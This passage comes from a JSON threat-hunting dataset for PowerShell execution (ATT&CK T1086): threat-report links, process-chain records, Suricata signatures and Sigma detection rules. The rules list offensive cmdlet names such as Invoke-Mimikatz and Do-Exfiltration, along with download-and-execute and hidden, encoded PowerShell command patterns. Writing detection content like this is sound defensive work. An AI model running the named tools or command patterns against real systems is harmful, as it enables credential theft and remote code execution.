"http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html", + "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html", + "https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/", + "http://www.symantec.com/connect/blogs/forkmeiamfamous-seaduke-latest-weapon-duke-armory", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.cybereason.com/blog/operation-cobalt-kitty-apt", + "https://www.clearskysec.com/wp-content/uploads/2018/11/MuddyWater-Operations-in-Lebanon-and-Oman.pdf", + "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "http://www.slideshare.net/MatthewDunwoody1/no-easy-breach-derby-con-2016", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east", + "https://blog.morphisec.com/cobalt-gang-2.0", + "https://www.us-cert.gov/ncas/alerts/TA17-164A", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://www.symantec.com/blogs/threat-intelligence/gallmaker-attack-group", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://www.youtube.com/watch?v=fevGZs0EQu8", + "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", + "https://www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf", + "https://www.proofpoint.com/us/threat-insight/post/apt-targets-financial-analysts", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/", + "https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.html", + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "https://www.symantec.com/blogs/threat-intelligence/seedworm-espionage-group", + "https://arstechnica.com/information-technology/2018/07/from-bitly-to-x-agent-how-gru-hackers-targeted-the-2016-presidential-election/", + "https://www2.fireeye.com/WBNR-Know-Your-Enemy-UNC622-Spear-Phishing.html", + "https://www.group-ib.com/blog/cobalt", + "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://blog.trendmicro.com/trendlabs-security-intelligence/another-potential-muddywater-campaign-uses-powershell-based-prb-backdoor/", + "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://blog.crowdstrike.com/deep-thought-chinese-targeting-national-security-think-tanks/", + "https://www.ptsecurity.com/upload/corporate/ww-en/analytics/Cobalt-2017-eng.pdf", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/", + "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html", + "https://securelist.com/muddywater/88059/", + "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html", NaN + ] + }, + { + "technique_id": "T1086", + "command_list": [ + "excel.exe", + "cmd.exe", + "powershell.exe", + "mshta.exe", + "powerpoint.exe", + "powershell.exe webClient.DownloadString(", + "powershell.exe webClient.DownloadFile", + "powershell.exe webClient.DownloadData", + "winword.exe", + "\\\\Windows\\\\.+\\\\WindowsPowerShell\\\\.+\\\\powershell.exehidden|-enc|-NonI", + "powershell/lateral_movement/invoke_psremoting", + "powershell/management/spawn", + "python/management/multi/spawn" + ], + "commands": [ + { + "command": "excel.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "cmd.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "powershell.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_2" + }, + { + "command": "powershell.exe", + "source": "Threat Hunting Tables", + "name": "sub_process_1" + }, + { + "command": "mshta.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powerpoint.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "powershell.exe webClient.DownloadString(", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell.exe webClient.DownloadFile", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "powershell.exe webClient.DownloadData", + "source": "Threat Hunting Tables", + "name": "" + }, + { + "command": "winword.exe", + "source": "Threat Hunting Tables", + "name": "parent_process" + }, + { + "command": "\\\\Windows\\\\.+\\\\WindowsPowerShell\\\\.+\\\\powershell.exehidden|-enc|-NonI", + "source": "SysmonHunter - PowerShell", + "name": "" + }, + { + "command": "powershell/lateral_movement/invoke_psremoting", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/management/spawn", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/management/multi/spawn", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "chain_id": "100025", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "powershell.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100029", + "os": "windows", + "parent_process": "excel.exe", + "commandline_string": "", + "sub_process_1": "powershell.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "scripting", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100042", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "powershell.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1086", + "itw_sample": "3560481cc51a08c94cd5649b2782ec1395d56d9a1721e6e03720420898772ed0" + }, + { + "chain_id": "100045", + "os": "windows", + "parent_process": "mshta.exe", + "commandline_string": "", + "sub_process_1": "powershell.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "scripting", + "mitre_attack": "T1086", + "itw_sample": "ee29b9c01318a1e23836b949942db14d4811246fdae2f41df9f0dcd922c63bc6" + }, + { + "chain_id": "100056", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "cmd.exe", + "sub_process_2": "powershell.exe", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100060", + "os": "windows", + "parent_process": "powerpoint.exe", + "commandline_string": "", + "sub_process_1": "powershell.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100064", + "os": "windows", + "parent_process": "powershell.exe", + "commandline_string": "webClient.DownloadString(", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100065", + "os": "windows", + "parent_process": "powershell.exe", + "commandline_string": "webClient.DownloadFile", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "chain_id": "100066", + "os": "windows", + "parent_process": "powershell.exe", + "commandline_string": "webClient.DownloadData", + "sub_process_1": "", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "low", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "https://www.joesandbox.com/analysis/35219/0/html" + }, + { + "chain_id": "100092", + "os": "windows", + "parent_process": "winword.exe", + "commandline_string": "", + "sub_process_1": "powershell.exe", + "sub_process_2": "", + "loaded_dll": "", + "registry_path": "", + "registry_value": "", + "file_path": "", + "file_value": "", + "frequency": "rare", + "mitre_caption": "powershell", + "mitre_attack": "T1086", + "itw_sample": "" + }, + { + "name": "PowerShell", + "description": null, + "level": "high", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "image": { + "pattern": "\\\\Windows\\\\.+\\\\WindowsPowerShell\\\\.+\\\\powershell.exe", + "flag": "regex" + }, + "cmdline": { + "pattern": "hidden|-enc|-NonI" + } + } + } + ] + }, + { + "Empire Module": "powershell/lateral_movement/invoke_psremoting", + "ATT&CK Technique #1": "T1086", + "ATT&CK Technique #2": "", + "Technique": "PowerShell", + "Concatenate for Python Dictionary": "\"powershell/lateral_movement/invoke_psremoting\": [\"T1086\"]," + }, + { + "Empire Module": "powershell/management/spawn", + "ATT&CK Technique #1": "T1086", + "ATT&CK Technique #2": "", + "Technique": "PowerShell", + "Concatenate for Python Dictionary": "\"powershell/management/spawn\": [\"T1086\"]," + }, + { + "Empire Module": "python/management/multi/spawn", + "ATT&CK Technique #1": "T1086", + "ATT&CK Technique #2": "", + "Technique": "PowerShell", + "Concatenate for Python Dictionary": "\"python/management/multi/spawn\": [\"T1086\"]," + }, + { + "Rules": "ET Pro", + "SID": "2027168", + "Signature": "ET POLICY Powershell Activity Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027169", + "Signature": "ET POLICY Powershell Command With No Profile Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027170", + "Signature": "ET POLICY Powershell Command With Hidden Window Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027171", + "Signature": "ET POLICY Powershell Command With Execution Bypass Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027172", + "Signature": "ET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2027173", + "Signature": "ET POLICY Powershell Command With NonInteractive Argument Over SMB - Likely Lateral Movement", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2025704", + "Signature": "ET POLICY SMB NT Create AndX Request For a Powershell .ps1 File", + "Verified": "Yes" + }, + { + "Rules": "ET Pro", + "SID": "2025705", + "Signature": "ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File", + "Verified": "Yes" + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_path contains \"powershell.exe\"or process_path contains \"powershell_ise.exe\"or process_path contains \"psexec.exe\")", + "name": "PowerShell" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"*.Download*\"or process_command_line contains \"*Net.WebClient*\")", + "name": "PowerShell Downloads Process" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Activity Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With No Profile Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With Hidden Window Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With Execution Bypass Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With Encoded Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY Powershell Command With NonInteractive Argument Over SMB - Likely Lateral Movement", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY SMB NT Create AndX Request For a Powershell .ps1 File", + "name": "ET Pro Rule" + }, + { + "product": "Suricata (NSM)", + "query": "ET POLICY SMB2 NT Create AndX Request For a Powershell .ps1 File", + "name": "ET Pro Rule" + } + ], + "possible_detections": [ + { + "title": "APT29", + "id": "033fe7d6-66d1-4240-ac6b-28908009c71f", + "description": "This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks", + "references": [ + "https://cloudblogs.microsoft.com/microsoftsecure/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/" + ], + "tags": [ + "attack.execution", + "attack.g0016", + "attack.t1086" + ], + "author": "Florian Roth", + "date": "2018/12/04", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "*-noni -ep bypass $*" + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "action": "global", + "title": "Empire Monkey", + "id": "10152a7b-b566-438f-a33c-390b607d1c8d", + "description": "Detects EmpireMonkey APT reported Activity", + "references": [ + "https://app.any.run/tasks/a4107649-8cb0-41af-ad75-113152d4d57b" + ], + "tags": [ + "attack.t1086", + "attack.execution" + ], + "date": "2019/04/02", + "author": "Markus Neis", + "detection": { + "condition": "1 of them" + }, + "falsepositives": [ + "Very Unlikely" + ], + "level": "critical" + }, + { + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_cutil": { + "CommandLine": [ + "*/i:%APPDATA%\\logs.txt scrobj.dll" + ], + "Image": [ + "*\\cutil.exe" + ] + }, + "selection_regsvr32": { + "CommandLine": [ + "*/i:%APPDATA%\\logs.txt scrobj.dll" + ], + "Description": [ + "Microsoft(C) Registerserver" + ] + } + } + }, + { + "title": "PowerShell Downgrade Attack", + "id": "6331d09b-4785-4c13-980f-f96661356249", + "status": "experimental", + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "references": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth (rule), Lee Holmes (idea)", + "logsource": { + "product": "windows", + "service": "powershell-classic" + }, + "detection": { + "selection": { + "EventID": 400, + "EngineVersion": "2.*" + }, + "filter": { + "HostVersion": "2.*" + }, + "condition": "selection and not filter" + }, + "falsepositives": [ + "Penetration Test", + "Unknown" + ], + "level": "medium" + }, + { + "title": "PowerShell called from an Executable Version Mismatch", + "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "status": "experimental", + "description": "Detects PowerShell called from an executable by the version mismatch method", + "references": [ + "https://adsecurity.org/?p=2921" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1086" + ], + "author": "Sean Metcalf (source), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell-classic" + }, + "detection": { + "selection1": { + "EventID": 400, + "EngineVersion": [ + "2.*", + "4.*", + "5.*" + ], + "HostVersion": "3.*" + }, + "condition": "selection1" + }, + "falsepositives": [ + "Penetration Tests", + "Unknown" + ], + "level": "high" + }, + { + "title": "Malicious PowerShell Commandlets", + "id": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "status": "experimental", + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "modified": "2019/01/22", + "references": [ + "https://adsecurity.org/?p=2921" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Sean Metcalf (source), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "keywords": { + "Message": [ + "*Invoke-DllInjection*", + "*Invoke-Shellcode*", + "*Invoke-WmiCommand*", + "*Get-GPPPassword*", + "*Get-Keystrokes*", + "*Get-TimedScreenshot*", + "*Get-VaultCredential*", + "*Invoke-CredentialInjection*", + "*Invoke-Mimikatz*", + "*Invoke-NinjaCopy*", + "*Invoke-TokenManipulation*", + "*Out-Minidump*", + "*VolumeShadowCopyTools*", + "*Invoke-ReflectivePEInjection*", + "*Invoke-UserHunter*", + "*Find-GPOLocation*", + "*Invoke-ACLScanner*", + "*Invoke-DowngradeAccount*", + "*Get-ServiceUnquoted*", + "*Get-ServiceFilePermission*", + "*Get-ServicePermission*", + "*Invoke-ServiceAbuse*", + "*Install-ServiceBinary*", + "*Get-RegAutoLogon*", + "*Get-VulnAutoRun*", + "*Get-VulnSchTask*", + "*Get-UnattendedInstallFile*", + "*Get-ApplicationHost*", + "*Get-RegAlwaysInstallElevated*", + "*Get-Unconstrained*", + "*Add-RegBackdoor*", + "*Add-ScrnSaveBackdoor*", + "*Gupt-Backdoor*", + "*Invoke-ADSBackdoor*", + "*Enabled-DuplicateToken*", + "*Invoke-PsUaCme*", + "*Remove-Update*", + "*Check-VM*", + "*Get-LSASecret*", + "*Get-PassHashes*", + "*Show-TargetScreen*", + "*Port-Scan*", + "*Invoke-PoshRatHttp*", + "*Invoke-PowerShellTCP*", + "*Invoke-PowerShellWMI*", + "*Add-Exfiltration*", + "*Add-Persistence*", + "*Do-Exfiltration*", + "*Start-CaptureServer*", + "*Get-ChromeDump*", + "*Get-ClipboardContents*", + "*Get-FoxDump*", + "*Get-IndexedItem*", + "*Get-Screenshot*", + "*Invoke-Inveigh*", + "*Invoke-NetRipper*", + "*Invoke-EgressCheck*", + "*Invoke-PostExfil*", + "*Invoke-PSInject*", + "*Invoke-RunAs*", + "*MailRaider*", + "*New-HoneyHash*", + "*Set-MacAttribute*", + "*Invoke-DCSync*", + "*Invoke-PowerDump*", + "*Exploit-Jboss*", + "*Invoke-ThunderStruck*", + "*Invoke-VoiceTroll*", + "*Set-Wallpaper*", + "*Invoke-InveighRelay*", + "*Invoke-PsExec*", + "*Invoke-SSHCommand*", + "*Get-SecurityPackages*", + "*Install-SSP*", + "*Invoke-BackdoorLNK*", + "*PowerBreach*", + "*Get-SiteListPassword*", + "*Get-System*", + "*Invoke-BypassUAC*", + "*Invoke-Tater*", + "*Invoke-WScriptBypassUAC*", + "*PowerUp*", + "*PowerView*", + "*Get-RickAstley*", + "*Find-Fruit*", + "*HTTP-Login*", + "*Find-TrustedDocuments*", + "*Invoke-Paranoia*", + "*Invoke-WinEnum*", + "*Invoke-ARPScan*", + "*Invoke-PortScan*", + "*Invoke-ReverseDNSLookup*", + "*Invoke-SMBScanner*", + "*Invoke-Mimikittenz*" + ] + }, + "false_positives": [ + "Get-SystemDriveInfo" + ], + "condition": "keywords and not false_positives" + }, + "falsepositives": [ + "Penetration testing" + ], + "level": "high" + }, + { + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "experimental", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "modified": "2019/01/22", + "references": [ + "https://adsecurity.org/?p=2921" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Sean Metcalf (source), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "keywords": { + "Message": [ + "*AdjustTokenPrivileges*", + "*IMAGE_NT_OPTIONAL_HDR64_MAGIC*", + "*Microsoft.Win32.UnsafeNativeMethods*", + "*ReadProcessMemory.Invoke*", + "*SE_PRIVILEGE_ENABLED*", + "*LSA_UNICODE_STRING*", + "*MiniDumpWriteDump*", + "*PAGE_EXECUTE_READ*", + "*SECURITY_DELEGATION*", + "*TOKEN_ADJUST_PRIVILEGES*", + "*TOKEN_ALL_ACCESS*", + "*TOKEN_ASSIGN_PRIMARY*", + "*TOKEN_DUPLICATE*", + "*TOKEN_ELEVATION*", + "*TOKEN_IMPERSONATE*", + "*TOKEN_INFORMATION_CLASS*", + "*TOKEN_PRIVILEGES*", + "*TOKEN_QUERY*", + "*Metasploit*", + "*Mimikatz*" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "PowerShell Credential Prompt", + "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", + "status": "experimental", + "description": "Detects PowerShell calling a credential prompt", + "references": [ + "https://twitter.com/JohnLaTwC/status/850381440629981184", + "https://t.co/ezOTGy1a1G" + ], + "tags": [ + "attack.execution", + "attack.credential_access", + "attack.t1086" + ], + "author": "John Lambert (idea), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "Script block logging must be enabled" + }, + "detection": { + "selection": { + "EventID": 4104 + }, + "keyword": { + "Message": [ + "*PromptForCredential*" + ] + }, + "condition": "all of them" + }, + "falsepositives": [ + "Unknown" + ], + "level": "high" + }, + { + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", + "status": "experimental", + "description": "Detects the use of PSAttack PowerShell hack tool", + "references": [ + "https://adsecurity.org/?p=2921" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Sean Metcalf (source), Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "selection": { + "EventID": 4103 + }, + "keyword": [ + "PS ATTACK!!!" + ], + "condition": "all of them" + }, + "falsepositives": [ + "Pentesters" + ], + "level": "high" + }, + { + "title": "PowerShell ShellCode", + "id": "16b37b70-6fcf-4814-a092-c36bd3aafcbd", + "status": "experimental", + "description": "Detects Base64 encoded Shellcode", + "references": [ + "https://twitter.com/cyb3rops/status/1063072865992523776" + ], + "tags": [ + "attack.privilege_escalation", + "attack.execution", + "attack.t1055", + "attack.t1086" + ], + "author": "David Ledbetter (shellcode), Florian Roth (rule)", + "date": "2018/11/17", + "logsource": { + "product": "windows", + "service": "powershell", + "description": "Script block logging must be enabled" + }, + "detection": { + "selection": { + "EventID": 4104 + }, + "keyword1": [ + "*AAAAYInlM*" + ], + "keyword2": [ + "*OiCAAAAYInlM*", + "*OiJAAAAYInlM*" + ], + "condition": "selection and keyword1 and keyword2" + }, + "falsepositives": [ + "Unknown" + ], + "level": "critical" + }, + { + "title": "Suspicious PowerShell Download", + "id": "65531a81-a694-4e31-ae04-f8ba5bc33759", + "status": "experimental", + "description": "Detects suspicious PowerShell download command", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth", + "logsource": { + "product": "windows", + "service": "powershell" + }, + "detection": { + "keywords": { + "Message": [ + "*System.Net.WebClient).DownloadString(*", + "*system.net.webclient).downloadfile(*" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "PowerShell scripts that download content from the Internet" + ], + "level": "medium" + }, + { + "title": "Suspicious PowerShell Invocations - Generic", + "id": "3d304fda-78aa-43ed-975c-d740798a49c1", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell" + }, + "detection": { + "encoded": [ + " -enc ", + " -EncodedCommand " + ], + "hidden": [ + " -w hidden ", + " -window hidden ", + " - windowstyle hidden " + ], + "noninteractive": [ + " -noni ", + " -noninteractive " + ], + "condition": "all of them" + }, + "falsepositives": [ + "Penetration tests", + "Very special / sneaky PowerShell scripts" + ], + "level": "high" + }, + { + "title": "Suspicious PowerShell Invocations - Specific", + "id": "fce5f582-cc00-41e1-941a-c6fabf0fdb8c", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Florian Roth (rule)", + "logsource": { + "product": "windows", + "service": "powershell" + }, + "detection": { + "keywords": { + "Message": [ + "* -nop -w hidden -c * [Convert]::FromBase64String*", + "* -w hidden -noni -nop -c \"iex(New-Object*", + "* -w hidden -ep bypass -Enc*", + "*powershell.exe reg add HKCU\\software\\microsoft\\windows\\currentversion\\run*", + "*bypass -noprofile -windowstyle hidden (new-object system.net.webclient).download*", + "*iex(New-Object Net.WebClient).Download*" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "Suspicious PowerShell Keywords", + "id": "1f49f2ab-26bc-48b3-96cc-dcffbc93eadf", + "status": "experimental", + "description": "Detects keywords that could indicate the use of some PowerShell exploitation framework", + "date": "2019/02/11", + "author": "Florian Roth", + "references": [ + "https://posts.specterops.io/entering-a-covenant-net-command-and-control-e11038bcf462" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "logsource": { + "product": "windows", + "service": "powershell", + "definition": "It is recommended to use the new \"Script Block Logging\" of PowerShell v5 https://adsecurity.org/?p=2277" + }, + "detection": { + "keywords": { + "Message": [ + "*[System.Reflection.Assembly]::Load*" + ] + }, + "condition": "keywords" + }, + "falsepositives": [ + "Penetration tests" + ], + "level": "high" + }, + { + "title": "Malicious PowerShell Commandlet Names", + "id": "f331aa1f-8c53-4fc3-b083-cc159bc971cb", + "status": "experimental", + "description": "Detects the creation of known powershell scripts for exploitation", + "references": [ + "https://raw.githubusercontent.com/Neo23x0/sigma/f35c50049fa896dff91ff545cb199319172701e8/rules/windows/powershell/powershell_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1086" + ], + "author": "Markus Neis", + "date": "2018/04/07", + "logsource": { + "product": "windows", + "service": "sysmon" + }, + "detection": { + "selection": { + "EventID": 11, + "TargetFilename": [ + "*\\Invoke-DllInjection.ps1", + "*\\Invoke-WmiCommand.ps1", + "*\\Get-GPPPassword.ps1", + "*\\Get-Keystrokes.ps1", + "*\\Get-VaultCredential.ps1", + "*\\Invoke-CredentialInjection.ps1", + "*\\Invoke-Mimikatz.ps1", + "*\\Invoke-NinjaCopy.ps1", + "*\\Invoke-TokenManipulation.ps1", + "*\\Out-Minidump.ps1", + "*\\VolumeShadowCopyTools.ps1", + "*\\Invoke-ReflectivePEInjection.ps1", + "*\\Get-TimedScreenshot.ps1", + "*\\Invoke-UserHunter.ps1", + "*\\Find-GPOLocation.ps1", + "*\\Invoke-ACLScanner.ps1", + "*\\Invoke-DowngradeAccount.ps1", + "*\\Get-ServiceUnquoted.ps1", + "*\\Get-ServiceFilePermission.ps1", + "*\\Get-ServicePermission.ps1", + "*\\Invoke-ServiceAbuse.ps1", + "*\\Install-ServiceBinary.ps1", + "*\\Get-RegAutoLogon.ps1", + "*\\Get-VulnAutoRun.ps1", + "*\\Get-VulnSchTask.ps1", + "*\\Get-UnattendedInstallFile.ps1", + "*\\Get-WebConfig.ps1", + "*\\Get-ApplicationHost.ps1", + "*\\Get-RegAlwaysInstallElevated.ps1", + "*\\Get-Unconstrained.ps1", + "*\\Add-RegBackdoor.ps1", + "*\\Add-ScrnSaveBackdoor.ps1", + "*\\Gupt-Backdoor.ps1", + "*\\Invoke-ADSBackdoor.ps1", + "*\\Enabled-DuplicateToken.ps1", + "*\\Invoke-PsUaCme.ps1", + "*\\Remove-Update.ps1", + "*\\Check-VM.ps1", + "*\\Get-LSASecret.ps1", + "*\\Get-PassHashes.ps1", + "*\\Show-TargetScreen.ps1", + "*\\Port-Scan.ps1", + "*\\Invoke-PoshRatHttp.ps1", + "*\\Invoke-PowerShellTCP.ps1", + "*\\Invoke-PowerShellWMI.ps1", + "*\\Add-Exfiltration.ps1", + "*\\Add-Persistence.ps1", + "*\\Do-Exfiltration.ps1", + "*\\Start-CaptureServer.ps1", + "*\\Invoke-ShellCode.ps1", + "*\\Get-ChromeDump.ps1", + "*\\Get-ClipboardContents.ps1", + "*\\Get-FoxDump.ps1", + "*\\Get-IndexedItem.ps1", 